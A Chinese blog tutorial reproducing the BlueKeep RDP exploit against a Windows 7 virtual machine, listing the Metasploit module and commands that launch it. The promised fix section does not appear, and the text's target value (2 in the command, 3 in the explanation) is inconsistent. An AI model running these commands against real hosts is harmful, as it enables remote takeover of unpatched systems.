bluekeep(cve_2019_0708)漏洞利用复现

版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接: https://blog.csdn.net/lynnlovemin/article/details/102493649

2019年5月,微软发布了关于CVE_2019_0708的漏洞补丁,该漏洞名为bluekeep,黑客利用该漏洞可以通过3389进行远程桌面登录,危害相当大,如果成功利用该漏洞,黑客完全可以像两年前一样,发展蠕虫勒索病毒。目前受影响的操作系统版本有:Windows 7、Windows Server 2008、Windows XP

近日,漏洞利用框架Metasploit(以后简称msf)官方发布了5.0.50版本,该版本加入了对bluekeep的漏洞利用攻击脚本,该模块目前只适用于64位版本的Windows7和Windows Server 2008,笔者在自己的虚拟机上搭建了Kali和靶向机(windows 7)作为演示,向读者展示如何利用该漏洞,并且如何修复它,帮助广大服务器管理员做好应对措施。

首先,分别打开Kali和Win7系统,如图所示:

640?wx_fmt=jpeg

640?wx_fmt=jpeg

然后在Kali终端输入命令msfconsole以启动msf,如图所示:

640?wx_fmt=jpeg

接下来就可以开始进行靶向机的攻击了,分别输入命令:

use exploit/windows/rdp/cve_2019_0708_bluekeep_rce

set rhosts 192.168.74.134

set target 2

exploit

即可。

其中rhosts为靶向机(目标机)IP,target设置为3,表示VMWare虚拟机,exploit表示开始攻击。

如果出现下图内容,说明攻击失败,可以尝试再次输入exploit。(注:由于这个漏洞利用模块为初始版本,不是很稳定,可能会多次失败。)

640?wx_fmt=jpeg

成功后,你将看到下图界面:

640?wx_fmt=png

猜你喜欢

转载自blog.csdn.net/lynnlovemin/article/details/102493649